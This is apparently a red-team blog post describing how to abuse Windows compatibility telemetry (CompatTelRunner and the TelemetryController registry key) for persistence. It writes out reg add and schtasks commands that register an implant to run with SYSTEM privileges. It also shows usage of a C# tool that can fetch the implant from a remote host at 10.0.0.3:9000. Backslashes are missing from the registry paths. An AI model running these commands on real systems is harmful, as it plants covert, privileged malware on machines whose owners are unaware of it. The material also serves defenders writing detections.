Microsoft has introduced the compatibility telemetry in order to collect usage and performance data about Windows systems. The telemetry tasks are collected via the binary “CompatTelRunner.exe” which is stored in the following location:
CompatTelRunner executes a variety of commands which are retrieved from specific registry keys. TrustedSec has identified that it is feasible to abuse the Windows telemetry mechanism for persistence during red team operations if elevated access has been achieved.
The persistence method requires the following steps:
- Creation of a registry subkey under the “TelemetryController” key
- Creation of “Command” key that will execute the arbitrary command or implant
- Creation of “DWORD” key set to Nightly with the data value set to “1”
- Execution of the “Microsoft Compatibility Appraiser” schedule task via the schtasks binary
The above methodology can be achieved by executing the following commands from the command line:
reg add HKLMSOFTWAREMicrosoftWindows NTCurrentVersionAppCompatFlagsTelemetryControllerPersistence
reg add "HKLMSoftwareMicrosoftWindows NTCurrentVersionAppCompatFlagsTelemetryControllerPersistence" /v Command /t REG_SZ /d "C:UsersPeterDownloadsdemon.x64.exe"
reg add "HKLMSoftwareMicrosoftWindows NTCurrentVersionAppCompatFlagsTelemetryControllerPersistence" /v Nightly /t REG_DWORD /d 1
schtasks /run /tn "MicrosoftWindowsApplication ExperienceMicrosoft Compatibility Appraiser"
Execution of the above commands will result the following modifications to the registry as displayed below:
Establishing persistence via Windows Telemetry can be achieved from an elevated implant session.
The telemetry is a C# binary which implements the persistence method by enabling red teams to use a local path in order to run an arbitrary payload.
shell telemetry.exe install /path:C:UserspeterDownloadsdemon.x64.exe
Alternatively, telemetry can be used to download an implant from a remote location to disk.
shell telemetry.exe install /url:http://10.0.0.3:9000/demon.x64.exe
Upon execution the tool will create the required registry structure as displayed in the image below:
The implant will be executed under the context of “CompatTelRunner.exe” process.
The schedule task is configured to run the “CompatTelRunner.exe” binary with SYSTEM level privileges and therefore the implant will executed with similar privileges.
This could be verified by executing the “whoami” command.
The following image displays the active sessions in the compromised host.